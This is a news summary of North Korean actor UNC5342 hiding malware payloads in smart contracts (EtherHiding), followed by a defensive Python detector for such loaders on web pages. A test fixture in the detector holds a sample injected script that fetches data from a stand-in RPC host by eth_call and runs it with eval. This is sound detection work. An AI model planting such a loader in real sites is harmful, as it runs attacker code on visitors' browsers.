North Korean hackers use blockchain malware to steal cryptocurrency via smart contracts.
A recent report from Google's Threat Intelligence Group reveals that North Korean state-sponsored hackers, tracked as UNC5342, are employing a technique called EtherHiding to store malware payloads inside smart contracts on public blockchains, in a campaign specifically targeting cryptocurrency transactions. This is the first observed instance of a nation-state actor using smart contracts for malware delivery: because the blockchain is immutable, the hosted code cannot be taken down, and the attackers can push updated payloads that are hard to detect or block. Victims are typically lured through compromised WordPress sites and social engineering, with the infection chain ending in the execution of a significant backdoor named INVISIBLEFERRET. The development underscores the evolving cyber-threat landscape and the need for robust security measures against state-sponsored espionage and financial theft, and it highlights the strategic importance of securing blockchain infrastructure in the global economy.
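As an added, defender-side example (not code from the article or from Google's report), the following Python heuristic scans the HTML of a site such as a WordPress page for inline scripts that combine two traits: a read from a smart contract over a public JSON-RPC endpoint and dynamic execution of whatever was fetched. It assumes that an EtherHiding-style loader retrieves its payload with a read-only `eth_call` and then evaluates the result; the sample pages, the `.invalid` hostnames and the contract-address placeholder are all constructed for the example. A contract read on its own is normal for a legitimate dApp, so only the combination is flagged.

```python
"""
Heuristic detector for EtherHiding-style loader scripts in page HTML.

Added example, not code from the article or from Google's report.
Assumption: the injected loader on a compromised page performs a
read-only smart-contract call (eth_call over a public JSON-RPC endpoint,
or a web3.js `.call()`) and then executes the returned content with
eval / new Function / document.write. Legitimate dApps read contracts
all the time, so a hit requires BOTH a chain-read indicator and a
dynamic-execution indicator in the same inline script.
"""
import re
from dataclasses import dataclass

# Inline <script> bodies only; external `src` scripts would need to be
# fetched first, which this example deliberately leaves out.
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)

CHAIN_READ_PATTERNS = [
    r"\beth_call\b",                               # raw JSON-RPC read
    r"\bcontract\.methods\.\w+\([^)]*\)\.call\b",  # web3.js contract read
    r"https?://[^\s'\"]*rpc[^\s'\"]*",             # public RPC endpoint URL
]
DYN_EXEC_PATTERNS = [
    r"\beval\s*\(",
    r"\bnew\s+Function\s*\(",
    r"\bdocument\.write\s*\(",
]


@dataclass
class Finding:
    script_index: int          # position of the <script> in the page
    chain_indicators: list[str]
    exec_indicators: list[str]


def _hits(patterns: list[str], text: str) -> list[str]:
    """Return the patterns that match anywhere in `text`."""
    return [p for p in patterns if re.search(p, text, re.I)]


def scan_html(html: str) -> list[Finding]:
    """Flag inline scripts that both read a contract and execute the result."""
    findings = []
    for index, match in enumerate(SCRIPT_RE.finditer(html)):
        body = match.group(1)
        chain = _hits(CHAIN_READ_PATTERNS, body)
        dyn = _hits(DYN_EXEC_PATTERNS, body)
        if chain and dyn:
            findings.append(Finding(index, chain, dyn))
    return findings


# Constructed sample 1: a legitimate dApp page that reads a balance from a
# contract but never evaluates fetched data. Must NOT be flagged.
BENIGN_DAPP_HTML = """
<html><body>
<script>
  const web3 = new Web3("https://mainnet-rpc.invalid/");
  const contract = new web3.eth.Contract(abi, tokenAddress);
  async function showBalance(addr) {
    const bal = await contract.methods.balanceOf(addr).call();
    document.getElementById("bal").textContent = bal;
  }
</script>
</body></html>
"""

# Constructed sample 2: an ordinary analytics script followed by an injected
# loader that reads a contract via eth_call and evals the response.
SUSPICIOUS_HTML = """
<html><body>
<script src="https://analytics.invalid/tag.js"></script>
<script>
  const rpc = "https://bsc-rpc.invalid/";
  async function l() {
    const r = await fetch(rpc, {method: "POST", body: JSON.stringify({
      jsonrpc: "2.0", method: "eth_call",
      params: [{to: "0xCONTRACT_ADDRESS_PLACEHOLDER", data: "0x"}, "latest"],
      id: 1})});
    const j = await r.json();
    eval(hexToString(j.result));
  }
  l();
</script>
</body></html>
"""

if __name__ == "__main__":
    for name, page in (("benign dApp", BENIGN_DAPP_HTML), ("suspicious", SUSPICIOUS_HTML)):
        print(name, "->", scan_html(page) or "no findings")
```

The heuristic is intentionally narrow: it will miss a loader that hides the RPC call behind obfuscation, and it should be paired with allow-listing of the site's known scripts and with monitoring of unexpected changes to WordPress theme and plugin files, which is where such injections usually land.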